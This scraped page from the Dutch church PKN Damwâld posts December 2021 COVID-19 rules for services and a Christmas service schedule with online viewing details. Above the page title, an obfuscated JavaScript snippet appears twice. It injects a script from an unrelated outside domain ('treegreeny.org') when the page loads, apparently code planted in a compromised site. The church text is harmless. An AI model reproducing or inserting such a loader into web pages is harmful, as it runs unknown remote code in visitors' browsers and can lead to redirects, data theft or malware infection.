;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerk & corona .... update diensten ! - PKN Damwâld

Kerk & corona …. update diensten !

Gepubliceerd op: donderdag 16 december 2021

De coronabesmettingen lopen weer op en onze regering heeft nieuwe maatregelen uitgevaardigd. Ook wij ontkomen er niet aan, hoe vervelend het ook is:

  • De banken worden weer in elkaar geschoven. Dit betekent dat er ongeveer 100 personen in de kerk passen. Als het te druk wordt is er een uitwijk naar de grote vergaderzaal
  • Bij binnenkomst graag de handen ontsmetten en als we niet zitten hebben we een mondkapje voor. Ook houden we weer de 1½ meter afstand aan, ook in de banken
  • Er hoeft (nog) niet vooraf aangemeld te worden en er worden ook geen begeleiders in gezet. U vindt vast zelf uw plek wel. Wilt u wel doorschuiven in de banken, zodat er geen lege plekken komen?
  • De kinderen van KingKids/Bernetsjerke gaan voor de dienst naar hun ruimten. Ze gaan dus niet mee in de kerk.

Bijbeluurtje Nij Tjaerda
Helaas kan het Bijbeluurtje in Nij Tjaerda niet doorgaan. Vanwege de maatregelen en de besmettingscijfers kan in deze maand niets georganiseerd worden in Nij Tjaerda. We wensen alle bewoners veel sterkte nu opnieuw in de decembermaand geen bijeenkomsten zijn.

Vrijdag 24 december kerstnachtdienst: 21.00 uur voorganger is Robert Colijn en m.m.v. delegatie van brasband “Ere zij God”.
Het thema is: Geef Licht. Kerst zit vol licht, maar is dit nou wel waar kerst om gaat? Het gaat om die baby, maar wat zegt die baby ons persoonlijk?

De dienst is alleen online te volgen. Vanaf 20.45 uur is er al mooie muziek te beluisteren. We hopen op een mooie en inspirerende online kerstnachtdienst. Dus met een hapje en een drankje hard meezingen met de mooie kerstliederen! Iedereen is welkom! Kijk mee en nodig ook vrienden, bekenden en buren uit om in hun eigen huis aan te sluiten bij de kerstnachtdienst van dit jaar.

Zaterdag 25 december 1e kerstdag: 9.30 uur ds. G. Otter

Eerste kerstdag wordt een afwisselende dienst, die mee voorbereid is door de Bernetsjerke en Kingkids. Verschillende kinderen zullen een bijdrage hebben. De dienst kun je live in de kerk en via de livestream volgen.

Zondag 26 december: Interkerkelijke Kerstviering op 2e Kerstdag om 9.30 uur

In verband met de geldende Corona maatregelen kan de dienst niet in de sporthal worden gehouden. Het wordt dit jaar een onlinedienst vanuit De Ontmoeting. De Evangelisatiecommissie heeft de dienst samen met ds. G.J. Otter voorbereid. Het thema is: “licht in donkere tijden”. Medewerking wordt verleend door het blazersensemble van de Brassband “Ere zij God “. Graag nodigen wij u uit om deze dienst “online “te volgen. Inloggen: PKN Damwald.nl/live

N.B.  Op 24, 26 en 31 december zijn de diensten alleen online te volgen via www.pkndamwald.nl en de kerkradio.